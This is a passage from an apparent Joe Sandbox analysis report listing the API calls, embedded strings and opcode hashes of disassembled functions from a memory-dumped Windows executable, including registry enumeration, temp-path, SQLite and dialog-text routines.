                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                    • memset.MSVCRT ref: 00405455
                                                                    • memset.MSVCRT ref: 0040546C
                                                                    • memset.MSVCRT ref: 00405483
                                                                    • memcpy.MSVCRT ref: 00405498
                                                                    • memcpy.MSVCRT ref: 004054AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy$ErrorLast
                                                                    • String ID: 6$\
                                                                    • API String ID: 404372293-1284684873
                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                    • String ID:
                                                                    • API String ID: 1331804452-0
                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                    APIs
                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: advapi32.dll
                                                                    • API String ID: 2012295524-4050573280
                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                    APIs
                                                                    Strings
                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                    • <%s>, xrefs: 004100A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                    • API String ID: 3473751417-2880344631
                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2521778956-791839006
                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscpy
                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                    • API String ID: 999028693-502967061
                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                    • memset.MSVCRT ref: 0040C439
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1973883786-0
                                                                    • Opcode ID: aab644086f84aa5fe26669a3e01f2add07a7b7d7e9a10155aef9e016587dcdb0
                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                    • Opcode Fuzzy Hash: aab644086f84aa5fe26669a3e01f2add07a7b7d7e9a10155aef9e016587dcdb0
                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004185FC
                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@AttributesFilememset
                                                                    • String ID:
                                                                    • API String ID: 776155459-0
                                                                    • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                    • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                    • malloc.MSVCRT ref: 00417524
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                    • String ID:
                                                                    • API String ID: 2308052813-0
                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$??3@
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 1589464350-1420421710
                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                    APIs
                                                                    Strings
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                    • malloc.MSVCRT ref: 004174BD
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                    • String ID:
                                                                    • API String ID: 2903831945-0
                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                    • memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                    • String ID:
                                                                    • API String ID: 1471605966-0
                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$??3@
                                                                    • String ID: g4@
                                                                    • API String ID: 3314356048-2133833424
                                                                    • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                    • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004100FB
                                                                    • memset.MSVCRT ref: 00410112
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                    • String ID: </%s>
                                                                    • API String ID: 3400436232-259020660
                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D58D
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                    • String ID: caption
                                                                    • API String ID: 1523050162-4135340389
                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
